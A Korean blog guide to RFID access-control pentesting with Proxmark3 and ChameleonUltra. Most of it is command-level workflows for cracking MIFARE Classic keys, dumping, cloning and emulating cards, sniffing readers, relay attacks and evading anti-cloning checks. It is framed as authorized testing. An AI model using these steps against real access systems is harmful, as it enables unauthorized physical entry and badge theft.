PART 1. Proxmark3 RDV4
1.1 아키텍처 및 펌웨어
Proxmark3 RDV4는 FPGA + ARM 이중 프로세서 구조다.
FPGA가 RF 레이어의 실시간 신호 처리(변복조)를 담당하고, ARM MCU가 상위 프로토콜 로직과 명령 실행을 처리한다.
| 구성 요소 | 역할 | 스펙 |
|---|---|---|
| FPGA (Spartan-II, 2s30vq100) | RF 신호 처리, 실시간 변복조 | LF/HF 이미지 분리 운용 — 전환 시 약 1초 소요 |
| ARM MCU (AT91SAM7S512 / ARM7TDMI) | 프로토콜 처리, 명령 실행 | 512KB 플래시, 64KB SRAM — Iceman 펌웨어 실행 |
| HF 안테나 (13.56MHz) | MIFARE/DESFire/iCLASS | RDV4 — 소켓 방식 교체 가능한 확장 안테나 |
| LF 안테나 (125kHz) | HID/EM/Indala/T5577 | RDV4 — 소켓 방식 교체 가능한 확장 안테나 |
| 외장 플래시 512KB | 키 딕셔너리, 펌웨어 저장 | 구형 256KB 대비 더 많은 기능 지원 |
⚠️ 하드웨어 참고: FPGA는 RF 변복조 전용이다. Hardnested 등 크래킹 연산은 PC CPU(AVX2 SIMD)에서 수행된다. RDV2·Easy 클론은 Hardnested를 지원하지 않으므로 RDV4 이상을 사용해야 한다.
Iceman 펌웨어 설치 (권장)
공식 펌웨어보다 Iceman fork가 훨씬 더 많은 기능과 최신 공격 알고리즘을 포함한다.
# 소스 빌드 및 설치 (Linux / macOS)
git clone https://github.com/RfidResearchGroup/proxmark3.git
cd proxmark3
make clean && make all
# 펌웨어 플래시 (PM3 연결 후)
./pm3-flash-all
# 클라이언트 실행
./pm3
1.2 기본 탐색 및 카드 식별 명령
# 하드웨어 확인
pm3 --> hw tune # 안테나 튜닝 상태 확인
pm3 --> hw ver # 펌웨어 버전 확인
pm3 --> hw status # 전체 하드웨어 상태
# 카드 자동 탐색
pm3 --> hf search # HF(13.56MHz) 카드 자동 탐색 및 식별
pm3 --> lf search # LF(125kHz) 카드 자동 탐색
pm3 --> auto # LF + HF 동시 자동 탐색
# 카드 상세 정보 확인
pm3 --> hf 14a reader # ISO14443A 리더 모드 (MIFARE 계열)
pm3 --> hf mf info # MIFARE Classic 상세 정보 (타입, UID, ATQA, SAK, PRNG 탐지)
pm3 --> hf mfdes info # DESFire 상세 정보 (버전, 앱 목록, 보안 설정)
pm3 --> hf iclass info # iCLASS 카드 정보
pm3 --> lf hid demod # HID 125kHz 카드 디모듈레이션
1.3 MIFARE Classic 전체 공격 워크플로우
MIFARE Classic은 현재도 전 세계 수억 장이 사용 중이다. Crypto1 암호화 알고리즘의 설계 결함으로 인해 여러 공격 경로가 존재한다.
Step 1 — 카드 정보 확인 및 PRNG 탐지
공격 기법 선택 전, 반드시 PRNG 유형을 먼저 확인한다.
pm3 --> hf mf info
# 결과 예시
UID : A1 B2 C3 D4
ATQA : 00 04
SAK : 08
TYPE : NXP MIFARE CLASSIC 1k
Prng detection: WEAK ← Darkside / Nested 공격 가능
Prng detection: HARDENED ← Hardnested 공격 필요
Step 1-1 — 키 딕셔너리 공격 (가장 먼저 시도)
# 플래시 메모리 딕셔너리 사용 (가장 빠름)
pm3 --> hf mf fchk --1k --mem
# 외부 딕셔너리 파일 사용
pm3 --> hf mf chk --1k -f mfc_default_keys.dic
Step 2 — Darkside 공격 (키를 전혀 모를 때, WEAK PRNG 전용)
pm3 --> hf mf darkside
# 결과 예시 → Key Found: a0b1c2d3e4f5
ℹ️ PRNG 패치 카드(Prng detection: HARDENED)에서는 Darkside가 실패한다 → Step 4 Hardnested로 이동
Step 3 — Nested 공격 (키 1개 보유 시, WEAK PRNG)
# 섹터 0 키 A = FFFFFFFFFFFF → 섹터 4 키 A 추출
pm3 --> hf mf nested --1k -s 0 -a -k FFFFFFFFFFFF --tblk 4 --ta
# autopwn: 알려진 키 1개로 전체 카드 자동 크래킹 + 덤프
pm3 --> hf mf autopwn -s 0 -a -k FFFFFFFFFFFF
# 딕셔너리 기반 자동 (키를 모를 때)
pm3 --> hf mf autopwn --1k -f mfc_default_keys
Step 4 — Hardnested 공격 (PRNG 패치 카드, 최소 키 1개 필요)
⚠️ Hardnested도 최소 1개의 섹터 키가 필요하다. 키가 전혀 없으면 먼저 Darkside 시도 (HARDENED 카드면 Reader Attack으로 리더기에서 키 추출).
# 섹터 0 키 A = 8829da9daf76 → 섹터 4 키 A 추출
# 연산은 PC CPU(AVX2 SIMD)에서 수행됨
pm3 --> hf mf hardnested -s 0 -a -k 8829da9daf76 --tblk 4 --ta
# nonce 파일로 저장 후 오프라인 크래킹
pm3 --> hf mf hardnested -s 0 -a -k 8829da9daf76 --tblk 4 --ta -w
Step 5 — 전체 카드 덤프
pm3 --> hf mf dump
pm3 --> hf mf dump --1k -k hf-mf-UID-key.bin -f hf-mf-UID-dump.bin
# 덤프 파일 내용 확인
pm3 --> hf mf view -f hf-mf-UID-dump.bin
Step 6 — 에뮬레이션 (가상 카드로 동작)
# 덤프 파일을 에뮬레이터 메모리에 로드
pm3 --> hf mf eload --1k -f hf-mf-UID-dump.bin
# 에뮬레이션 시작
pm3 --> hf mf sim -u 353C2AA6
Step 7 — Magic 카드에 복제
# Gen1A Magic 카드 — UID 포함 전체 블록 쓰기 가능
pm3 --> hf mf restore --1k --uid A29558E4 -k hf-mf-A29558E4-key.bin -f hf-mf-A29558E4-dump.bin
# Gen2 Magic 카드 — 블록 0 직접 쓰기
pm3 --> hf mf wrbl --blk 0 -k FFFFFFFFFFFF -d D3A2859F6B880400C8010020000000BD
공격 선택 흐름도
hf mf info → PRNG 탐지
│
├─ 딕셔너리 공격 (fchk --mem) ─── 성공 → autopwn → dump → 복제
│ 실패 ↓
├─ [WEAK] Darkside 공격 ────────── 성공 → Nested → autopwn → dump
│ 실패(HARDENED) ↓
├─ [HARDENED] Reader Attack ────── 성공 → Hardnested → dump → 복제
│ (Mfkey32/64)
└─ Hardnested 공격 (키 1개 필요) → dump → 복제
1.4 LF(125kHz) 카드 공격
pm3 --> lf search # LF 카드 자동 식별
# EM4100 읽기 및 T5577에 복제
pm3 --> lf em 410x reader
pm3 --> lf em 410x clone --id 0102030405
# HID Prox 읽기 및 T5577에 복제
pm3 --> lf hid reader
pm3 --> lf hid clone -r 2004263360
# Indala 읽기 및 복제
pm3 --> lf indala reader
pm3 --> lf indala clone --raw <raw_data>
1.5 DESFire 분석 및 정보 수집
DESFire EV2/EV3는 AES-128 암호화로 직접 크래킹이 현실적으로 불가능하다. 단, 시스템 세팅 취약점 탐색(UID 모드 여부)은 가능하다.
pm3 --> hf mfdes info # 버전, 하드웨어 정보, UID, AES 활성화 여부 확인
pm3 --> hf mfdes enumapps # Application 목록 조회
pm3 --> hf mfdes lsapp # 앱 구조 상세 확인
# 카드-리더기 간 통신 스니핑
pm3 --> hf 14a snoop # 패킷 캡처
✔️ 탐지 방법: hf mfdes info 결과에서 PICC 레벨 AES 인증 없이 UID만 응답하면 UID-only 모드로 잘못 세팅된 것이다 → UID 에뮬레이션 공격 가능.
1.6 iCLASS 공격
pm3 --> hf iclass info
pm3 --> hf iclass dump -k 0102030405060708 # 알려진 키로 덤프
# 기본 키 딕셔너리 공격
pm3 --> hf iclass chk -f iclass_default_keys.dic
# Loclass 공격 (구형 iCLASS Standard)
pm3 --> hf iclass loclass -f iclass_mac_attack.bin
1.7 리더기 스니핑 (Reader Sniffing)
출입문 리더기와 카드 사이의 실제 통신을 캡처한다. Proxmark3를 카드와 리더기 사이에 물리적으로 위치시킨다.
pm3 --> hf 14a snoop # ISO14443A 통신 스니핑
pm3 --> hf mf snoop # MIFARE Classic 전용 스니핑
# 수집된 nonce에서 키 복구
# - 2쌍 수집 → mfkey32 사용
# - 1쌍만 수집 → mfkey64 사용
pm3 --> hf mf nonces # 수집된 nonce 분석
pm3 --> hf mf elog --decrypt # 로그 복호화 및 키 복구
PART 2. ChameleonUltra — 심층 운용 가이드
2.1 아키텍처
ChameleonUltra는 Nordic nRF52840 SoC 기반의 차세대 RFID 에뮬레이터다. 기존 ChameleonMini/Tiny의 단순 에뮬레이션에서 읽기/쓰기/크래킹까지 통합한 올인원 도구다. 크래킹 성능은 Proxmark3와 동급 이상이다.
| 구성 요소 | 스펙 | 역할 |
|---|---|---|
| Nordic nRF52840 | ARM Cortex-M4F @ 64MHz | 메인 프로세서 + BLE 5.0 통합 |
| HF 안테나 (13.56MHz) | 8개 슬롯 지원 | MIFARE, DESFire, NTAG 에뮬레이션/읽기/크래킹 |
| LF 안테나 (125kHz) | 8개 슬롯 지원 | EM410x, HID, Indala 에뮬레이션/읽기 |
| BLE 5.0 | 저전력 무선 | MTools BLE 앱으로 스마트폰 원격 제어 |
| USB-C | 펌웨어 업데이트, CLI | OTA 업데이트 또는 유선 연결 |
| 배터리 | 35mAh 소형 리튬 (버튼형) | 1회 충전 약 6개월 (하루 8회 × 3초 스와이프 기준) |
2.2 지원 카드 타입 및 운용 모드
| 카드 타입 | 읽기 | 에뮬레이션 | 쓰기/복제 | 크래킹 | 비고 |
|---|---|---|---|---|---|
| MIFARE Classic 1K/4K | ✅ | ✅ | ✅ | ✅ | Darkside, Nested, StaticNested, Hardnested, MFKEY32 v2 전부 지원 |
| MIFARE Plus SL1 | ✅ | ✅ | ✅ | ✅ | SL1은 Classic과 동일 취약 |
| MIFARE Plus SL3 | ✅ (UID) | ✅ (UID) | △ | ❌ | AES 모드 크래킹 불가 |
| DESFire EV1/EV2 | ✅ (UID) | ✅ (UID) | △ | ❌ | AES 인증 시 불가 |
| NTAG210~218 | ✅ | ✅ | ✅ | N/A | 암호화 없음 |
| MIFARE Ultralight / C / EV1 | ✅ | ✅ | ✅ | N/A | — |
| EM410x (125kHz) | ✅ | ✅ | ✅ | N/A | 단순 UID 복제 |
| HID Prox (125kHz) | ✅ | ✅ | ✅ | N/A | T5577 포맷 |
| Indala (125kHz) | ✅ | ✅ | ✅ | N/A | — |
2.3 CLI 운용 (USB 연결)
# 시리얼 연결
screen /dev/ttyACM0 115200
# 또는 공식 파이썬 CLI
python3 chameleon_cli_main.py
# 슬롯 관리
hw slot list # 슬롯 목록 확인
hw slot change -s 2 # 슬롯 2로 전환
hw slot activate -s 1 # 슬롯 1 활성화
# 카드 읽기
hf 14a scan # HF 카드 스캔
hf mf rdbl -s 0 -k FFFFFFFFFFFF # MIFARE Classic 블록 읽기
hf mf clone # 카드 데이터를 현재 슬롯에 저장
# 에뮬레이션 설정
hf 14a emulate -t mifare_1k # 에뮬레이션 타입 설정
hf 14a emulate -u 0A1B2C3D # UID 수동 설정
# Mfkey32 리더기 공격 (CLI)
hf mf mfkey32 enable # nonce 수집 모드 활성화
hf mf mfkey32 collect # 리더기 접촉 후 수집 확인
hf mf mfkey32 recover # 수집된 nonce로 키 복구
2.4 MTools BLE 앱 운용 (iOS / Android)
PC 없이 현장에서 즉각적인 운용을 가능하게 하는 핵심 인터페이스다.
| 기능 | MTools BLE 경로 | CLI 명령 |
|---|---|---|
| 카드 스캔 | Slot Manager > Scan | hf 14a scan |
| 슬롯 전환 | 슬롯 번호 탭 | hw slot change -s N |
| Mfkey32 수집 | MIFARE Settings > Mfkey32 | hf mf mfkey32 enable |
| 키 복구 | Recover Keys | hf mf mfkey32 recover |
| 덤프 임포트 | Dump Import > BIN/MCT/JSON | (파일 전송) |
| Gen1A 모드 | MIFARE Settings > Gen1A Magic Mode | (GUI 토글) |
| 펌웨어 OTA | OTA Tool > Update | (DFU 모드) |
| 슬롯 이름 편집 | Slot name editor | — |
2.5 ChameleonUltra 핵심 공격 기법
① Reader Attack — Mfkey32 v2 (리더기 대상 키 추출)
피해자 카드 없이 리더기만으로 마스터 키를 추출하는 가장 강력한 공격이다.
1. ChameleonUltra를 빈 MIFARE Classic 1K로 세팅
2. MTools BLE 앱에서 'Mfkey32 모드' 활성화
3. 타깃 출입문 리더기에 ChameleonUltra 접촉
4. 리더기가 인증 Challenge 전송 → nonce 자동 수집
5. 앱에서 'Recover Keys' 실행 → Mfkey32 v2로 키 복구
6. 복구된 키를 슬롯에 저장 → 정상 카드로 에뮬레이션
② 다중 신분 전환 (Multi-Identity Switching)
16개 슬롯(HF 8 + LF 8)에 각각 다른 카드 데이터를 저장하고 버튼 한 번 또는 앱으로 즉시 전환한다.
슬롯 HF-1: 청소직원 LF HID 카드 → 1층~5층 접근
슬롯 HF-2: IT 관리자 MIFARE Classic → 서버실 접근
슬롯 HF-3: 방문객 DESFire EV2 UID → 로비 접근
슬롯 LF-1: 주차장 EM4100 카드
슬롯 HF-4~8: 추가 신원 또는 테스트용
③ Gen1A / Gen2 Magic 카드 에뮬레이션
블록 0(UID, 제조사 데이터)를 자유롭게 쓸 수 있는 Magic 카드 동작을 완벽히 에뮬레이션한다.
# MTools BLE 앱 또는 CLI에서 설정
# Gen1A Magic Mode: ON → Proxmark3 cload 명령으로 블록 0 쓰기 허용
# Gen2 Magic Mode: ON → 블록 0 직접 쓰기 가능
2.6 Proxmark3 + ChameleonUltra 연동 파이프라인
두 기기의 장점을 결합한 완성된 물리적 모의해킹 파이프라인이다.
──────────────────────────────────────────────────────────
단계 역할 도구
──────────────────────────────────────────────────────────
1. 정찰 PM3 주도 Proxmark3 RDV4 + 확장 안테나
카드 타입, UID, ATQA/SAK, PRNG 유형 수집
2. 크래킹 PM3 주도 Proxmark3 + 노트북 (PC CPU AVX2)
Darkside → Nested → Hardnested → .bin 덤프
3. 리더기 ChameleonUltra 주도 ChameleonUltra + MTools BLE
공격 Mfkey32 v2로 리더기에서 직접 키 추출
4. 이전 BLE 전송 MTools BLE 앱
덤프 파일 → ChameleonUltra 슬롯 로드
5. 침투 ChameleonUltra 주도 ChameleonUltra (주머니 속)
16개 슬롯 전환하며 여러 출입문 통과
6. 보고 문서화 작성 도구
──────────────────────────────────────────────────────────
PART 3. 고급 기법 및 특수 시나리오
3.1 Magic 카드 탐지 우회
일부 고급 출입 통제 시스템은 Anti-Cloning 기능으로 Magic 카드 또는 에뮬레이터를 탐지한다.
| 탐지 방법 | 원리 | 우회 방법 |
|---|---|---|
| Gen1A Backdoor 탐지 | 0x40(7-bit), 0x43 명령 응답 확인 | Gen2 또는 Gen4 카드 사용 / ChameleonUltra Magic Mode 비활성화 |
| NXP 서명 검증 | NXP 공장 ECDSA 서명 존재 여부 확인 | 정품 카드 또는 Gen4 Ultimate 카드 |
| 랜덤 UID 확인 | 매 접촉마다 UID 변경 테스트 | ChameleonUltra 고정 UID 에뮬레이션으로 우회 |
| ATQA/SAK 정확성 | 비표준 값 탐지 | ChameleonUltra에서 정확한 ATQA/SAK 수동 설정 |
| 응답 타이밍 분석 | 에뮬레이터와 실제 칩의 응답 속도 차이 측정 | ChameleonUltra는 nRF52840 고속 클럭으로 차이 최소화 |
3.2 Wiegand 프로토콜 공격
Wiegand는 RFID 리더기와 출입문 컨트롤러 사이의 통신 프로토콜로, 비암호화 평문 전송이 기본이다. 물리적 탭(Tap)으로 데이터 도청이 가능하다.
# D0/D1 신호선 물리 탭 후 Proxmark3로 캡처
# Wiegand 코드 분석
pm3 --> lf hid wiegand -r 0x0002000F
# T5577에 복제
pm3 --> lf hid clone -r <raw_data>
ℹ️ 특징: 카드와 리더기가 모두 올바르게 세팅되어 있어도 케이블에 물리 접근하는 것만으로 우회 가능하다. Wiegand 계층의 별도 암호화가 필요한 이유다.
3.3 통신 릴레이 공격 (Relay Attack)
공격자 A가 타깃 카드 근처에서 신호를 수신하고, 공격자 B가 출입문 리더기 근처에서 신호를 중계하여 타깃이 완전히 다른 장소에 있어도 출입문을 개방하는 공격이다.
[공격자 A] [공격자 B]
피해자 근처 (1m 이내) 출입문 리더기 근처
롱레인지 RFID 안테나 리더기에 태그
신호 수집 ──BT/인터넷──▶ 신호 중계·재전송
결과: 피해자가 다른 건물에 있어도 출입문 개방
ℹ️ 방어: NXP DESFire EV3는 Proximity Check(근접성 검증) 기능으로 릴레이 공격을 방어한다. AES 모드와 함께 사용 시 현재까지 가장 효과적인 방어 수단이다.
3.4 현장 운용 체크리스트
사전 준비
- 서면 허가서 및 모의해킹 범위(Scope) 확인 (필수)
- Proxmark3 — Iceman fork 최신 펌웨어 업데이트
- ChameleonUltra — 펌웨어 및 MTools BLE 앱 최신 버전 확인
- 키 딕셔너리 최신화 (
mfc_default_keys.dic) - 배터리 충전 상태 확인 (ChameleonUltra — 앱에서 확인)
- Magic 카드(Gen1A/Gen2) 및 T5577 카드 지참
현장 정찰
- 출입문 리더기 종류 식별 (HID / MIFARE / DESFire 로고 확인)
- 카드 두께·크기로 LF vs HF 추정
-
hf search/lf search로 타깃 카드 타입 확인 -
hf mf info로 PRNG 유형 (WEAK/HARDENED) 확인 - DESFire 카드 →
hf mfdes info로 AES 활성화 여부 확인
공격 실행
- MIFARE Classic:
autopwn→ 덤프 → ChameleonUltra 복제 - UID-only 시스템: UID 수집 → ChameleonUltra 에뮬레이션
- 리더기 공격: ChameleonUltra Mfkey32 모드 → 키 추출
- LF 카드:
lf search→ T5577에 복제
증거 수집 및 보고
- 전체 작업 로그 저장
- 덤프 파일 백업
- 취약한 세팅 스크린샷/사진 촬영
- 공격 성공/실패 결과 및 영향도 기록
부록. 명령어 퀵 레퍼런스
Proxmark3 전체 명령어
| 명령어 | 기능 | 카테고리 |
|---|---|---|
hw tune |
안테나 상태 확인 | 하드웨어 |
hw ver |
펌웨어 버전 확인 | 하드웨어 |
hf search |
HF 카드 자동 식별 + PRNG 탐지 | 탐색 |
lf search |
LF 카드 자동 식별 | 탐색 |
auto |
LF + HF 동시 탐색 | 탐색 |
hf mf info |
MIFARE Classic 상세 정보 | MIFARE |
hf mf fchk --1k --mem |
플래시 딕셔너리로 키 공격 | MIFARE 크래킹 |
hf mf autopwn |
자동 크래킹 + 덤프 (원커맨드) | MIFARE 크래킹 |
hf mf darkside |
Darkside 공격 (WEAK PRNG 전용) | MIFARE 크래킹 |
hf mf nested |
Nested 공격 (키 1개 + WEAK PRNG) | MIFARE 크래킹 |
hf mf hardnested |
Hardnested 공격 (키 1개 + HARDENED) | MIFARE 크래킹 |
hf mf dump |
전체 카드 덤프 | MIFARE |
hf mf eload |
덤프 파일 에뮬레이터 로드 | MIFARE 에뮬레이션 |
hf mf sim |
카드 에뮬레이션 시작 | MIFARE 에뮬레이션 |
hf mf restore |
Magic 카드에 덤프 복원 | MIFARE 복제 |
hf mf snoop |
카드-리더기 통신 스니핑 | 스니핑 |
hf 14a snoop |
ISO14443A 통신 스니핑 | 스니핑 |
hf mf elog --decrypt |
스니핑 로그에서 키 복구 | 스니핑 |
hf mfdes info |
DESFire 상세 정보 + AES 활성화 여부 | DESFire |
hf mfdes enumapps |
DESFire Application 목록 | DESFire |
hf iclass info |
iCLASS 카드 정보 | iCLASS |
hf iclass chk |
iCLASS 키 딕셔너리 공격 | iCLASS |
hf iclass loclass |
Loclass 공격 (구형 iCLASS Standard) | iCLASS |
lf hid reader |
HID 카드 읽기 | LF |
lf hid clone |
HID 카드 복제 (T5577) | LF |
lf hid wiegand |
Wiegand 코드 분석 | LF |
lf em 410x reader |
EM4100 읽기 | LF |
lf em 410x clone |
EM4100 복제 | LF |
ChameleonUltra 핵심 기능 대조표
| 기능 | MTools BLE 경로 | CLI 명령 |
|---|---|---|
| 카드 스캔 | Slot Manager > Scan | hf 14a scan |
| 슬롯 전환 | 슬롯 번호 탭 | hw slot change -s N |
| 슬롯 활성화 | 슬롯 탭 > 활성화 | hw slot activate -s N |
| Mfkey32 v2 수집 | MIFARE Settings > Mfkey32 | hf mf mfkey32 enable |
| 키 복구 | Recover Keys | hf mf mfkey32 recover |
| 덤프 임포트 | Dump Import > BIN/MCT/JSON | (파일 전송) |
| Gen1A 모드 | MIFARE Settings > Gen1A Magic Mode | (GUI 토글) |
| Gen2 모드 | MIFARE Settings > Gen2 Magic Mode | (GUI 토글) |
| 펌웨어 OTA | OTA Tool > Update | (DFU 모드) |
| 슬롯 이름 편집 | Slot name editor | — |
| BLE 연결 | 앱 실행 후 기기 스캔 | — |
카드 타입별 공격 전략 요약
| 카드 | 최적 공격 전략 | 주도 도구 |
|---|---|---|
| EM4100 / HID 125kHz | lf search → T5577 즉시 복제 |
Proxmark3 / Flipper Zero |
| MIFARE Classic (기본 키) | fchk --mem → dump → 복제 |
Proxmark3 |
| MIFARE Classic (커스텀 키, WEAK) | autopwn (Darkside/Nested) |
Proxmark3 |
| MIFARE Classic (커스텀 키, HARDENED) | Reader Attack → Hardnested → dump | Proxmark3 + ChameleonUltra |
| DESFire EV2 (UID 모드) | hf mfdes info → UID 확인 → CU 에뮬레이션 |
Proxmark3 + ChameleonUltra |
| 리더기 마스터 키 추출 | Mfkey32 v2 Reader Attack | ChameleonUltra |
| iCLASS Standard | loclass → dump → 복제 |
Proxmark3 |
변경 이력 (검토 수정 사항)
| 항목 | 원문 오류 | 수정 내용 |
|---|---|---|
| Proxmark3 RDV4 CPU | ARM Cortex-M4 | AT91SAM7S512 (ARM7TDMI) — hw status 실제 출력값 기반 |
| FPGA 모델 | Spartan-6 | 2s30vq100 (Spartan-II 계열) — 펌웨어 실제 이미지명 기반 |
| Hardnested 연산 주체 | "FPGA가 크래킹 오프로딩" | PC CPU(AVX2 SIMD)에서 수행 — FPGA는 RF 처리 전담 |
| ChameleonUltra 크래킹 기능 | StaticNested 누락 | MFKEY32 v2, Darkside, Nested, StaticNested, Hardnested 전부 추가 |
| PRNG 탐지 단계 누락 | 없음 | hf mf info → WEAK/HARDENED 확인 단계 추가 |
| Mfkey32 / Mfkey64 구분 누락 | Mfkey32만 언급 | nonce 쌍 수에 따른 도구 선택 기준 추가 |
'🥕 저장소 (Dev & Tools) > 잡다구리 (ETC)' 카테고리의 다른 글
| 해킹 상황별 도구 및 활용 전략 (0) | 2026.02.21 |
|---|---|
| 기업 네트워크 계층 구조 정리 (0) | 2026.02.21 |
| 공개 와이파이, 진짜 위험한가? HTTPS면 안전하지 않나? (0) | 2026.02.18 |
| 웹사이트 접속가능여부 확인 (0) | 2026.02.09 |
| Mifare Classic (0) | 2025.09.21 |